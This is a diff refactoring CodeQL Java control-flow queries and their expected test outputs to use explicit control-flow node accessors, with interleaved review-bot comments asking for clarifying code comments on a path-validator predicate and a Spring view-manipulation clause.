idOf(bb, result) } diff --git a/java/ql/lib/semmle/code/java/frameworks/Assertions.qll b/java/ql/lib/semmle/code/java/frameworks/Assertions.qll index 287346b8536..e7f86b9bfd8 100644 --- a/java/ql/lib/semmle/code/java/frameworks/Assertions.qll +++ b/java/ql/lib/semmle/code/java/frameworks/Assertions.qll 
@@ -109,12 +109,12 @@ predicate assertFail(BasicBlock bb, ControlFlowNode n) { bb = n.getBasicBlock() and ( exists(AssertTrueMethod m | - n = m.getACheck(any(BooleanLiteral b | b.getBooleanValue() = false)) + n.asExpr() = m.getACheck(any(BooleanLiteral b | b.getBooleanValue() = false)) ) or exists(AssertFalseMethod m | - n = m.getACheck(any(BooleanLiteral b | b.getBooleanValue() = true)) + n.asExpr() = m.getACheck(any(BooleanLiteral b | b.getBooleanValue() = true)) ) or - exists(AssertFailMethod m | n = m.getACheck()) or - n.(AssertStmt).getExpr().(BooleanLiteral).getBooleanValue() = false + exists(AssertFailMethod m | n.asExpr() = m.getACheck()) or + n.asStmt().(AssertStmt).getExpr().(BooleanLiteral).getBooleanValue() = false ) } diff --git a/java/ql/lib/semmle/code/java/metrics/MetricCallable.qll b/java/ql/lib/semmle/code/java/metrics/MetricCallable.qll index a888050185e..d3dca781e54 100644 --- a/java/ql/lib/semmle/code/java/metrics/MetricCallable.qll +++ b/java/ql/lib/semmle/code/java/metrics/MetricCallable.qll @@ -73,14 +73,14 @@ class MetricCallable extends Callable { // so there should be a branching point for each non-default switch // case (ignoring those that just fall through to the next case). private predicate branchingSwitchCase(ConstCase sc) { - not sc.(ControlFlowNode).getASuccessor() instanceof SwitchCase and + not sc.getControlFlowNode().getASuccessor().asStmt() instanceof SwitchCase and not defaultFallThrough(sc) } private predicate defaultFallThrough(ConstCase sc) { - exists(DefaultCase default | default.(ControlFlowNode).getASuccessor() = sc) + exists(DefaultCase default | default.getControlFlowNode().getASuccessor().asStmt() = sc) or - defaultFallThrough(sc.(ControlFlowNode).getAPredecessor()) + defaultFallThrough(sc.getControlFlowNode().getAPredecessor().asStmt()) } /** Holds if `stmt` is a branching statement used for the computation of cyclomatic complexity. */ 
diff --git a/java/ql/lib/semmle/code/java/security/PathSanitizer.qll b/java/ql/lib/semmle/code/java/security/PathSanitizer.qll index 77803e3e27d..e841eb598cc 100644 --- a/java/ql/lib/semmle/code/java/security/PathSanitizer.qll +++ b/java/ql/lib/semmle/code/java/security/PathSanitizer.qll @@ -29,15 +29,19 @@ private module ValidationMethod { */ private predicate validationMethod(Method m, int arg) { exists( - Guard g, SsaImplicitInit var, ControlFlowNode exit, ControlFlowNode normexit, boolean branch + Guard g, SsaImplicitInit var, ControlFlow::ExitNode exit, ControlFlowNode normexit, + boolean branch | validationGuard(g, var.getAUse(), branch) and var.isParameterDefinition(m.getParameter(arg)) and - exit = m and + exit.getEnclosingCallable() = m and normexit.getANormalSuccessor() = exit and 1 = strictcount(ControlFlowNode n | n.getANormalSuccessor() = exit) | - g.(ConditionNode).getABranchSuccessor(branch) = exit or + exists(ConditionNode conditionNode | + g = conditionNode.getCondition() and conditionNode.getABranchSuccessor(branch) = exit + ) + or g.controls(normexit.getBasicBlock(), branch) ) } diff --git a/java/ql/lib/semmle/code/java/security/Validation.qll b/java/ql/lib/semmle/code/java/security/Validation.qll index b8183b10751..50f0a9aab1b 100644 --- a/java/ql/lib/semmle/code/java/security/Validation.qll +++ b/java/ql/lib/semmle/code/java/security/Validation.qll @@ -50,7 +50,7 @@ private predicate validatedAccess(VarAccess va) { bb.getNode(i + 1) = node.getANormalSuccessor() | bb.bbStrictlyDominates(va.getBasicBlock()) or - bb.getNode(any(int j | j > i)) = va + bb.getNode(any(int j | j > i)).asExpr() = va ) ) ) diff --git a/java/ql/src/Likely Bugs/Comparison/UselessComparisonTest.qll b/java/ql/src/Likely Bugs/Comparison/UselessComparisonTest.qll index e0029ffeba2..2933ae5305e 100644 --- a/java/ql/src/Likely Bugs/Comparison/UselessComparisonTest.qll +++ b/java/ql/src/Likely Bugs/Comparison/UselessComparisonTest.qll 
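Review bot: `validationMethod` in PathSanitizer.qll now locates the method's exit through `exit.getEnclosingCallable() = m` with `exit` typed as `ControlFlow::ExitNode`, and nothing next to it explains why the single-predecessor condition `1 = strictcount(ControlFlowNode n | n.getANormalSuccessor() = exit)` is required. This predicate appears to decide which methods are accepted as path validators, so a later edit that misreads the constraint could silently widen or narrow what the path queries treat as sanitized. A short comment would pin it down, for example `// exit is m's exit node; require exactly one normal predecessor so the guard sits on the only normal way out`. The stated intent is my reading of the code and should be confirmed by the author.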
@@ -30,7 +30,7 @@ predicate uselessTest(ConditionNode s1, BinaryExpr test, boolean testIsTrue) { ConditionBlock cb, SsaVariable v, BinaryExpr cond, boolean condIsTrue, int k1, int k2, CompileTimeConstantExpr c1, CompileTimeConstantExpr c2 | - s1 = cond and + s1.getCondition() = cond and cb.getCondition() = cond and cond.hasOperands(v.getAUse(), c1) and c1.getIntValue() = k1 and diff --git a/java/ql/src/Likely Bugs/Concurrency/DoubleCheckedLockingWithInitRace.ql b/java/ql/src/Likely Bugs/Concurrency/DoubleCheckedLockingWithInitRace.ql index 241825c092e..17b9fc93d21 100644 --- a/java/ql/src/Likely Bugs/Concurrency/DoubleCheckedLockingWithInitRace.ql +++ b/java/ql/src/Likely Bugs/Concurrency/DoubleCheckedLockingWithInitRace.ql @@ -36,7 +36,7 @@ where doubleCheckedLocking(if1, if2, sync, f) and a.getEnclosingStmt().getEnclosingStmt*() = if2.getThen() and se.getEnclosingStmt().getEnclosingStmt*() = sync.getBlock() and - a.(ControlFlowNode).getASuccessor+() = se and + a.getControlFlowNode().getASuccessor+().asExpr() = se and a.getDest().(FieldAccess).getField() = f select a, "Potential race condition. This assignment to $@ is visible to other threads before the subsequent statements are executed.", diff --git a/java/ql/src/Likely Bugs/Concurrency/LazyInitStaticField.ql b/java/ql/src/Likely Bugs/Concurrency/LazyInitStaticField.ql index 757da40c6e6..13f4ef7c451 100644 --- a/java/ql/src/Likely Bugs/Concurrency/LazyInitStaticField.ql +++ b/java/ql/src/Likely Bugs/Concurrency/LazyInitStaticField.ql 
@@ -64,12 +64,12 @@ class ValidSynchStmt extends Stmt { exists(MethodCall lockAction | lockAction.getQualifier() = lockField.getAnAccess() and lockAction.getMethod().getName() = "lock" and - dominates(lockAction, this) + dominates(lockAction.getControlFlowNode(), this.getControlFlowNode()) ) and exists(MethodCall unlockAction | unlockAction.getQualifier() = lockField.getAnAccess() and unlockAction.getMethod().getName() = "unlock" and - postDominates(unlockAction, this) + postDominates(unlockAction.getControlFlowNode(), this.getControlFlowNode()) ) ) } diff --git a/java/ql/src/Likely Bugs/Concurrency/UnreleasedLock.ql b/java/ql/src/Likely Bugs/Concurrency/UnreleasedLock.ql index 4efaf4f9820..d46acc6aee0 100644 --- a/java/ql/src/Likely Bugs/Concurrency/UnreleasedLock.ql +++ b/java/ql/src/Likely Bugs/Concurrency/UnreleasedLock.ql @@ -59,11 +59,11 @@ class LockType extends RefType { } predicate lockBlock(LockType t, BasicBlock b, int locks) { - locks = strictcount(int i | b.getNode(i) = t.getLockAccess()) + locks = strictcount(int i | b.getNode(i).asExpr() = t.getLockAccess()) } predicate unlockBlock(LockType t, BasicBlock b, int unlocks) { - unlocks = strictcount(int i | b.getNode(i) = t.getUnlockAccess()) + unlocks = strictcount(int i | b.getNode(i).asExpr() = t.getUnlockAccess()) } /** @@ -90,11 +90,11 @@ predicate failedLock(LockType t, BasicBlock lockblock, BasicBlock exblock) { exists(ControlFlowNode lock | lock = lockblock.getLastNode() and ( - lock = t.getLockAccess() + lock.asExpr() = t.getLockAccess() or exists(SsaExplicitUpdate lockbool | // Using the value of `t.getLockAccess()` ensures that it is a `tryLock` call. - lock = lockbool.getAUse() and + lock.asExpr() = lockbool.getAUse() and lockbool.getDefiningExpr().(VariableAssign).getSource() = t.getLockAccess() ) ) and 
@@ -147,12 +147,12 @@ predicate blockIsLocked(LockType t, BasicBlock src, BasicBlock b, int locks) { ) } -from Callable c, LockType t, BasicBlock src, BasicBlock exit, MethodCall lock +from Callable c, LockType t, BasicBlock src, ExitBlock exit, MethodCall lock where // Restrict results to those methods that actually attempt to unlock. t.getUnlockAccess().getEnclosingCallable() = c and blockIsLocked(t, src, exit, _) and - exit.getLastNode() = c and - lock = src.getANode() and + exit.getEnclosingCallable() = c and + lock = src.getANode().asExpr() and lock = t.getLockAccess() select lock, "This lock might not be unlocked or might be locked more times than it is unlocked." diff --git a/java/ql/src/Likely Bugs/Termination/ConstantLoopCondition.ql b/java/ql/src/Likely Bugs/Termination/ConstantLoopCondition.ql index 7dc893edaef..9cf8ab9b61f 100644 --- a/java/ql/src/Likely Bugs/Termination/ConstantLoopCondition.ql +++ b/java/ql/src/Likely Bugs/Termination/ConstantLoopCondition.ql @@ -61,7 +61,7 @@ predicate mainLoopCondition(LoopStmt loop, Expr cond) { else loopReentry = cond | last.getEnclosingStmt().getEnclosingStmt*() = loop.getBody() and - last.getASuccessor().(Expr).getParent*() = loopReentry + last.getASuccessor().asExpr().getParent*() = loopReentry ) } @@ -75,7 +75,7 @@ where // None of the ssa variables in `cond` are updated inside the loop. forex(SsaVariable ssa, VarRead use | ssa.getAUse() = use and use.getParent*() = cond | not ssa.getCfgNode().getEnclosingStmt().getEnclosingStmt*() = loop or - ssa.getCfgNode().(Expr).getParent*() = loop.(ForStmt).getAnInit() + ssa.getCfgNode().asExpr().getParent*() = loop.(ForStmt).getAnInit() ) and // And `cond` does not use method calls, field reads, or array reads. not exists(MethodCall ma | ma.getParent*() = cond) and diff --git a/java/ql/src/Security/CWE/CWE-833/LockOrderInconsistency.ql b/java/ql/src/Security/CWE/CWE-833/LockOrderInconsistency.ql index 4e9857f3b93..899218838b9 100644 
--- a/java/ql/src/Security/CWE/CWE-833/LockOrderInconsistency.ql +++ b/java/ql/src/Security/CWE/CWE-833/LockOrderInconsistency.ql @@ -80,8 +80,8 @@ predicate badReentrantLockOrder(MethodCall first, MethodCall second, MethodCall otherSecond = v1.getLockAction() and second = v2.getLockAction() and otherFirst = v2.getLockAction() and - first.(ControlFlowNode).getASuccessor+() = second and - otherFirst.(ControlFlowNode).getASuccessor+() = otherSecond + first.getControlFlowNode().getASuccessor+() = second.getControlFlowNode() and + otherFirst.getControlFlowNode().getASuccessor+() = otherSecond.getControlFlowNode() | v1 != v2 ) diff --git a/java/ql/src/Violations of Best Practice/Declarations/BreakInSwitchCase.ql b/java/ql/src/Violations of Best Practice/Declarations/BreakInSwitchCase.ql index 312a77878fe..2fe9d3cc672 100644 --- a/java/ql/src/Violations of Best Practice/Declarations/BreakInSwitchCase.ql +++ b/java/ql/src/Violations of Best Practice/Declarations/BreakInSwitchCase.ql @@ -17,7 +17,7 @@ import Common from SwitchStmt s, Stmt c where c = s.getACase() and - not c.(ControlFlowNode).getASuccessor() instanceof SwitchCase and + not c.getControlFlowNode().getASuccessor().asStmt() instanceof SwitchCase and not s.(Annotatable).suppressesWarningsAbout("fallthrough") and mayDropThroughWithoutComment(s, c) select c, diff --git a/java/ql/src/Violations of Best Practice/Declarations/Common.qll b/java/ql/src/Violations of Best Practice/Declarations/Common.qll index 0f95df4b5c4..9211c4b0f29 100644 --- a/java/ql/src/Violations of Best Practice/Declarations/Common.qll +++ b/java/ql/src/Violations of Best Practice/Declarations/Common.qll 
@@ -24,15 +24,15 @@ predicate switchCaseControlFlowPlus(SwitchStmt switch, BasicBlock b1, BasicBlock exists(BasicBlock mid | switchCaseControlFlowPlus(switch, mid, b2) and switchCaseControlFlow(switch, b1, mid) and - not mid.getFirstNode() = switch.getACase() + not mid.getFirstNode().asStmt() = switch.getACase() ) } predicate mayDropThroughWithoutComment(SwitchStmt switch, Stmt switchCase) { switchCase = switch.getACase() and exists(Stmt other, BasicBlock b1, BasicBlock b2 | - b1.getFirstNode() = switchCase and - b2.getFirstNode() = other and + b1.getFirstNode().asStmt() = switchCase and + b2.getFirstNode().asStmt() = other and switchCaseControlFlowPlus(switch, b1, b2) and other = switch.getACase() and not fallThroughCommented(other) diff --git a/java/ql/src/experimental/Security/CWE/CWE-094/SpringViewManipulationLib.qll b/java/ql/src/experimental/Security/CWE/CWE-094/SpringViewManipulationLib.qll index 256947a2dc7..0771db5ee32 100644 --- a/java/ql/src/experimental/Security/CWE/CWE-094/SpringViewManipulationLib.qll +++ b/java/ql/src/experimental/Security/CWE/CWE-094/SpringViewManipulationLib.qll @@ -55,7 +55,7 @@ module SpringViewManipulationConfig implements DataFlow::ConfigSig { // a = "redirect:" + taint` // ``` exists(AddExpr e, StringLiteral sl | - node.asExpr() = e.getControlFlowNode().getASuccessor*() and + node.asExpr() = e.getControlFlowNode().getASuccessor*().asExpr() and sl = e.getLeftOperand*() and sl.getValue().matches(["redirect:%", "ajaxredirect:%", "forward:%"]) ) diff --git a/java/ql/test/library-tests/controlflow/basic/bbStmts.expected b/java/ql/test/library-tests/controlflow/basic/bbStmts.expected index e1a8d6b4ade..0fbf3623f08 100644 --- a/java/ql/test/library-tests/controlflow/basic/bbStmts.expected +++ b/java/ql/test/library-tests/controlflow/basic/bbStmts.expected 
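Review bot: The changed clause in `SpringViewManipulationConfig` matches `node` against every expression reachable through `e.getControlFlowNode().getASuccessor*()`, which is control-flow reachability rather than a value derived from the concatenation, and no comment explains that breadth. The enclosing predicate starts outside the hunk, so its role is not visible here. If it is a barrier, every expression evaluated after a `"redirect:"` concatenation would be treated as safe and results could be dropped. I would document the intent next to the clause, for example `// Any expression evaluated after e, not only values built from it`, or narrow the clause if that was not meant.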
@@ -1,7 +1,7 @@ | Test.java:3:14:3:17 | { ... } | 0 | Test.java:3:14:3:17 | { ... } | | Test.java:3:14:3:17 | { ... } | 1 | Test.java:3:14:3:17 | super(...) | -| Test.java:3:14:3:17 | { ... } | 2 | Test.java:3:14:3:17 | Test | -| Test.java:4:14:4:17 | test | 0 | Test.java:4:14:4:17 | test | +| Test.java:3:14:3:17 | { ... } | 2 | Test.java:3:14:3:17 | Exit | +| Test.java:4:14:4:17 | Exit | 0 | Test.java:4:14:4:17 | Exit | | Test.java:4:21:76:2 | { ... } | 0 | Test.java:4:21:76:2 | { ... } | | Test.java:4:21:76:2 | { ... } | 1 | Test.java:5:3:5:12 | var ...; | | Test.java:4:21:76:2 | { ... } | 2 | Test.java:5:11:5:11 | 0 | diff --git a/java/ql/test/library-tests/controlflow/basic/bbStmts.ql b/java/ql/test/library-tests/controlflow/basic/bbStmts.ql index 89a32acf448..3b16a3844b5 100644 --- a/java/ql/test/library-tests/controlflow/basic/bbStmts.ql +++ b/java/ql/test/library-tests/controlflow/basic/bbStmts.ql @@ -3,5 +3,5 @@ import default from BasicBlock b, ControlFlowNode n, int i where b.getNode(i) = n and - b.getFile().(CompilationUnit).fromSource() + b.getEnclosingCallable().getFile().(CompilationUnit).fromSource() select b, i, n diff --git a/java/ql/test/library-tests/controlflow/basic/bbStrictDominance.expected b/java/ql/test/library-tests/controlflow/basic/bbStrictDominance.expected index 13382ba1fba..8440209d0a4 100644 --- a/java/ql/test/library-tests/controlflow/basic/bbStrictDominance.expected +++ b/java/ql/test/library-tests/controlflow/basic/bbStrictDominance.expected @@ -1,4 +1,4 @@ -| Test.java:4:21:76:2 | { ... } | Test.java:4:14:4:17 | test | +| Test.java:4:21:76:2 | { ... } | Test.java:4:14:4:17 | Exit | | Test.java:4:21:76:2 | { ... } | Test.java:11:14:14:3 | { ... } | | Test.java:4:21:76:2 | { ... } | Test.java:14:10:16:3 | { ... } | | Test.java:4:21:76:2 | { ... } | Test.java:18:3:18:8 | ; | 
@@ -20,7 +20,7 @@ | Test.java:4:21:76:2 | { ... } | Test.java:60:12:62:5 | { ... } | | Test.java:4:21:76:2 | { ... } | Test.java:63:9:66:4 | { ... } | | Test.java:4:21:76:2 | { ... } | Test.java:70:3:70:9 | ; | -| Test.java:18:3:18:8 | ; | Test.java:4:14:4:17 | test | +| Test.java:18:3:18:8 | ; | Test.java:4:14:4:17 | Exit | | Test.java:18:3:18:8 | ; | Test.java:22:4:22:10 | ; | | Test.java:18:3:18:8 | ; | Test.java:24:4:24:10 | return ... | | Test.java:18:3:18:8 | ; | Test.java:30:15:33:3 | { ... } | diff --git a/java/ql/test/library-tests/controlflow/basic/bbSuccessor.expected b/java/ql/test/library-tests/controlflow/basic/bbSuccessor.expected index 0cf2c96d022..0886f784fd9 100644 --- a/java/ql/test/library-tests/controlflow/basic/bbSuccessor.expected +++ b/java/ql/test/library-tests/controlflow/basic/bbSuccessor.expected @@ -6,7 +6,7 @@ | Test.java:18:3:18:8 | ; | Test.java:24:4:24:10 | return ... | | Test.java:22:4:22:10 | ; | Test.java:30:15:33:3 | { ... } | | Test.java:22:4:22:10 | ; | Test.java:35:3:35:9 | ; | -| Test.java:24:4:24:10 | return ... | Test.java:4:14:4:17 | test | +| Test.java:24:4:24:10 | return ... | Test.java:4:14:4:17 | Exit | | Test.java:30:15:33:3 | { ... } | Test.java:35:3:35:9 | ; | | Test.java:35:3:35:9 | ; | Test.java:38:9:38:9 | x | | Test.java:38:9:38:9 | x | Test.java:38:16:41:3 | { ... } | @@ -27,4 +27,4 @@ | Test.java:57:15:60:5 | { ... } | Test.java:70:3:70:9 | ; | | Test.java:60:12:62:5 | { ... } | Test.java:54:26:54:26 | j | | Test.java:63:9:66:4 | { ... } | Test.java:54:26:54:26 | j | -| Test.java:70:3:70:9 | ; | Test.java:4:14:4:17 | test | +| Test.java:70:3:70:9 | ; | Test.java:4:14:4:17 | Exit | diff --git a/java/ql/test/library-tests/controlflow/basic/strictDominance.ql b/java/ql/test/library-tests/controlflow/basic/strictDominance.ql index 2d366a4f372..10529b6d5c8 100644 --- a/java/ql/test/library-tests/controlflow/basic/strictDominance.ql +++ b/java/ql/test/library-tests/controlflow/basic/strictDominance.ql 
@@ -2,5 +2,5 @@ import default import semmle.code.java.controlflow.Dominance from Stmt pre, Stmt post -where strictlyDominates(pre, post) +where strictlyDominates(pre.getControlFlowNode(), post.getControlFlowNode()) select pre, post diff --git a/java/ql/test/library-tests/controlflow/basic/strictPostDominance.ql b/java/ql/test/library-tests/controlflow/basic/strictPostDominance.ql index 9948718fc83..99268a03c4b 100644 --- a/java/ql/test/library-tests/controlflow/basic/strictPostDominance.ql +++ b/java/ql/test/library-tests/controlflow/basic/strictPostDominance.ql @@ -2,5 +2,5 @@ import default import semmle.code.java.controlflow.Dominance from Stmt pre, Stmt post -where strictlyPostDominates(post, pre) +where strictlyPostDominates(post.getControlFlowNode(), pre.getControlFlowNode()) select post, pre diff --git a/java/ql/test/library-tests/controlflow/dominance/dominanceBad.ql b/java/ql/test/library-tests/controlflow/dominance/dominanceBad.ql index 26d33d9d07b..41b23313ec8 100644 --- a/java/ql/test/library-tests/controlflow/dominance/dominanceBad.ql +++ b/java/ql/test/library-tests/controlflow/dominance/dominanceBad.ql @@ -4,6 +4,6 @@ import semmle.code.java.controlflow.Dominance from IfStmt i, BlockStmt b where b = i.getThen() and - dominates(i.getThen(), b) and - dominates(i.getElse(), b) + dominates(i.getThen().getControlFlowNode(), b.getControlFlowNode()) and + dominates(i.getElse().getControlFlowNode(), b.getControlFlowNode()) select i, b diff --git a/java/ql/test/library-tests/controlflow/dominance/dominanceWrong.ql b/java/ql/test/library-tests/controlflow/dominance/dominanceWrong.ql index 298e0752ee4..5ee23224d5f 100644 --- a/java/ql/test/library-tests/controlflow/dominance/dominanceWrong.ql +++ b/java/ql/test/library-tests/controlflow/dominance/dominanceWrong.ql 
@@ -17,5 +17,5 @@ predicate dominanceCounterExample(ControlFlowNode entry, ControlFlowNode dom, Co from Callable c, ControlFlowNode dom, ControlFlowNode node where (strictlyDominates(dom, node) or bbStrictlyDominates(dom, node)) and - dominanceCounterExample(c.getBody(), dom, node) + dominanceCounterExample(c.getBody().getControlFlowNode(), dom, node) select c, dom, node diff --git a/java/ql/test/library-tests/controlflow/dominance/dominatedByStart.ql b/java/ql/test/library-tests/controlflow/dominance/dominatedByStart.ql index b5bdf688996..9a0d1b0c4bb 100644 --- a/java/ql/test/library-tests/controlflow/dominance/dominatedByStart.ql +++ b/java/ql/test/library-tests/controlflow/dominance/dominatedByStart.ql @@ -3,14 +3,14 @@ import default import semmle.code.java.controlflow.Dominance ControlFlowNode reachableIn(Method func) { - result = func.getBody() or + result = func.getBody().getControlFlowNode() or result = reachableIn(func).getASuccessor() } from Method func, ControlFlowNode entry, ControlFlowNode node where - func.getBody() = entry and + func.getBody().getControlFlowNode() = entry and reachableIn(func) = node and entry != node and - not strictlyDominates(func.getBody(), node) + not strictlyDominates(func.getBody().getControlFlowNode(), node) select func, node diff --git a/java/ql/test/library-tests/controlflow/dominance/dominator.expected b/java/ql/test/library-tests/controlflow/dominance/dominator.expected index e0f1596e42b..de43e6721e6 100644 --- a/java/ql/test/library-tests/controlflow/dominance/dominator.expected +++ b/java/ql/test/library-tests/controlflow/dominance/dominator.expected 
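Review bot: In dominatedByStart.ql the `where` clause binds `entry` to `func.getBody().getControlFlowNode()` and then writes the same expression out again inside the negated call, so the entry node now appears three times in this hunk. Assuming `getControlFlowNode()` yields a single node per statement, the last condition can use the bound variable: `not strictlyDominates(entry, node)`. That ties the dominance check to the same node that `entry != node` compares against, and leaves one less place to touch if the body-to-node mapping changes again. The `reachableIn` predicate and the select clause are both fully inside the hunk.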
@@ -27,7 +27,7 @@ | Test.java:14:18:14:18 | y | Test.java:14:14:14:18 | ... + ... | | Test.java:17:3:17:12 | if (...) | Test.java:17:7:17:7 | x | | Test.java:17:7:17:7 | x | Test.java:17:11:17:11 | 0 | -| Test.java:17:7:17:11 | ... < ... | Test.java:2:6:2:9 | test | +| Test.java:17:7:17:11 | ... < ... | Test.java:2:6:2:9 | Exit | | Test.java:17:7:17:11 | ... < ... | Test.java:18:4:18:10 | ; | | Test.java:17:7:17:11 | ... < ... | Test.java:20:11:20:11 | z | | Test.java:17:11:17:11 | 0 | Test.java:17:7:17:11 | ... < ... | @@ -163,7 +163,7 @@ | Test.java:83:9:83:9 | c | Test.java:83:5:83:9 | ...=... | | Test.java:85:4:85:15 | if (...) | Test.java:85:8:85:8 | a | | Test.java:85:8:85:8 | a | Test.java:85:13:85:14 | 10 | -| Test.java:85:8:85:14 | ... == ... | Test.java:74:6:74:10 | test2 | +| Test.java:85:8:85:14 | ... == ... | Test.java:74:6:74:10 | Exit | | Test.java:85:8:85:14 | ... == ... | Test.java:86:5:86:10 | break | | Test.java:85:8:85:14 | ... == ... | Test.java:87:4:87:15 | if (...) | | Test.java:85:13:85:14 | 10 | Test.java:85:8:85:14 | ... == ... | diff --git a/java/ql/test/library-tests/controlflow/dominance/dominatorExists.ql b/java/ql/test/library-tests/controlflow/dominance/dominatorExists.ql index 34469a686b1..220e4f275d5 100644 --- a/java/ql/test/library-tests/controlflow/dominance/dominatorExists.ql +++ b/java/ql/test/library-tests/controlflow/dominance/dominatorExists.ql @@ -4,13 +4,13 @@ import semmle.code.java.controlflow.Dominance /** transitive dominance */ ControlFlowNode reachableIn(Method func) { - result = func.getBody() or + result = func.getBody().getControlFlowNode() or result = reachableIn(func).getASuccessor() } from Method func, ControlFlowNode node where node = reachableIn(func) and - node != func.getBody() and + node != func.getBody().getControlFlowNode() and not iDominates(_, node) select func, node 
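Review bot: The doc comment on `reachableIn` in dominatorExists.ql still reads `/** transitive dominance */`, which describes reachability as dominance. The predicate body in this hunk collects the body's control-flow node and everything reachable from it through `getASuccessor()`. A comment such as `/** Gets a control-flow node reachable from the body of func. */` would match the code. The query's own condition, `not iDominates(_, node)`, is where dominance comes in, so the current wording invites a misreading of what the test asserts.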
diff --git a/java/ql/test/library-tests/controlflow/paths/paths.ql b/java/ql/test/library-tests/controlflow/paths/paths.ql index 389c46a48f5..33e51acef78 100644 --- a/java/ql/test/library-tests/controlflow/paths/paths.ql +++ b/java/ql/test/library-tests/controlflow/paths/paths.ql @@ -5,7 +5,7 @@ class PathTestConf extends ActionConfiguration { PathTestConf() { this = "PathTestConf" } override predicate isAction(ControlFlowNode node) { - node.(MethodCall).getMethod().hasName("action") + node.asExpr().(MethodCall).getMethod().hasName("action") } } diff --git a/java/ql/test/library-tests/java7/MultiCatch/MultiCatchControlFlow.expected b/java/ql/test/library-tests/java7/MultiCatch/MultiCatchControlFlow.expected index 40a8e58c4fe..a849ab5392d 100644 --- a/java/ql/test/library-tests/java7/MultiCatch/MultiCatchControlFlow.expected +++ b/java/ql/test/library-tests/java7/MultiCatch/MultiCatchControlFlow.expected @@ -1,4 +1,4 @@ -| MultiCatch.java:6:14:6:23 | super(...) | MultiCatch.java:6:14:6:23 | MultiCatch | +| MultiCatch.java:6:14:6:23 | super(...) | MultiCatch.java:6:14:6:23 | Exit | | MultiCatch.java:6:14:6:23 | { ... } | MultiCatch.java:6:14:6:23 | super(...) | | MultiCatch.java:8:2:20:2 | { ... } | MultiCatch.java:9:3:19:3 | try ... | | MultiCatch.java:9:3:19:3 | try ... | MultiCatch.java:10:3:15:3 | { ... } | @@ -16,7 +16,7 @@ | MultiCatch.java:17:4:17:4 | e | MultiCatch.java:17:4:17:22 | printStackTrace(...) | | MultiCatch.java:17:4:17:22 | printStackTrace(...) | MultiCatch.java:18:10:18:10 | e | | MultiCatch.java:17:4:17:23 | ; | MultiCatch.java:17:4:17:4 | e | -| MultiCatch.java:18:4:18:11 | throw ... | MultiCatch.java:7:14:7:23 | multiCatch | +| MultiCatch.java:18:4:18:11 | throw ... | MultiCatch.java:7:14:7:23 | Exit | | MultiCatch.java:18:10:18:10 | e | MultiCatch.java:18:4:18:11 | throw ... | | MultiCatch.java:23:2:33:2 | { ... } | MultiCatch.java:24:3:32:4 | try ... | | MultiCatch.java:24:3:32:4 | try ... | MultiCatch.java:25:3:31:3 | { ... } | 
@@ -31,12 +31,12 @@ | MultiCatch.java:28:12:28:12 | c | MultiCatch.java:30:10:30:24 | new Exception(...) | | MultiCatch.java:29:5:29:29 | throw ... | MultiCatch.java:31:5:31:37 | catch (...) | | MultiCatch.java:29:11:29:28 | new SQLException(...) | MultiCatch.java:29:5:29:29 | throw ... | -| MultiCatch.java:30:4:30:25 | throw ... | MultiCatch.java:22:14:22:24 | multiCatch2 | +| MultiCatch.java:30:4:30:25 | throw ... | MultiCatch.java:22:14:22:24 | Exit | | MultiCatch.java:30:4:30:25 | throw ... | MultiCatch.java:31:5:31:37 | catch (...) | | MultiCatch.java:30:10:30:24 | new Exception(...) | MultiCatch.java:30:4:30:25 | throw ... | | MultiCatch.java:31:5:31:37 | catch (...) | MultiCatch.java:31:36:31:36 | e | | MultiCatch.java:31:36:31:36 | e | MultiCatch.java:32:3:32:4 | { ... } | -| MultiCatch.java:32:3:32:4 | { ... } | MultiCatch.java:22:14:22:24 | multiCatch2 | +| MultiCatch.java:32:3:32:4 | { ... } | MultiCatch.java:22:14:22:24 | Exit | | MultiCatch.java:36:2:42:2 | { ... } | MultiCatch.java:37:3:41:4 | try ... | | MultiCatch.java:37:3:41:4 | try ... | MultiCatch.java:38:3:40:3 | { ... } | | MultiCatch.java:38:3:40:3 | { ... } | MultiCatch.java:39:10:39:26 | new IOException(...) | @@ -45,4 +45,4 @@ | MultiCatch.java:39:10:39:26 | new IOException(...) | MultiCatch.java:40:5:40:22 | catch (...) | | MultiCatch.java:40:5:40:22 | catch (...) | MultiCatch.java:40:21:40:21 | e | | MultiCatch.java:40:21:40:21 | e | MultiCatch.java:41:3:41:4 | { ... } | -| MultiCatch.java:41:3:41:4 | { ... } | MultiCatch.java:35:14:35:26 | ordinaryCatch | +| MultiCatch.java:41:3:41:4 | { ... } | MultiCatch.java:35:14:35:26 | Exit | diff --git a/java/ql/test/library-tests/pattern-instanceof/cfg.expected b/java/ql/test/library-tests/pattern-instanceof/cfg.expected index 29de1e4a3a8..b6caebd532a 100644 --- a/java/ql/test/library-tests/pattern-instanceof/cfg.expected +++ b/java/ql/test/library-tests/pattern-instanceof/cfg.expected 
@@ -1,4 +1,4 @@ -| Test.java:1:14:1:17 | super(...) | Test.java:1:14:1:17 | Test | +| Test.java:1:14:1:17 | super(...) | Test.java:1:14:1:17 | Exit | | Test.java:1:14:1:17 | { ... } | Test.java:1:14:1:17 | super(...) | | Test.java:3:40:20:3 | { ... } | Test.java:5:5:5:34 | var ...; | | Test.java:5:5:5:34 | var ...; | Test.java:5:26:5:33 | source(...) | @@ -29,7 +29,7 @@ | Test.java:11:12:11:12 | s | Test.java:11:7:11:13 | sink(...) | | Test.java:14:5:14:92 | if (...) | Test.java:14:9:14:9 | o | | Test.java:14:9:14:9 | o | Test.java:14:9:14:91 | ...instanceof... | -| Test.java:14:9:14:91 | ...instanceof... | Test.java:3:22:3:25 | test | +| Test.java:14:9:14:91 | ...instanceof... | Test.java:3:22:3:25 | Exit | | Test.java:14:9:14:91 | ...instanceof... | Test.java:14:41:14:47 | tainted | | Test.java:14:22:14:91 | Outer(...) | Test.java:14:94:18:5 | { ... } | | Test.java:14:28:14:67 | Inner(...) | Test.java:14:77:14:90 | alsoNotTainted | 
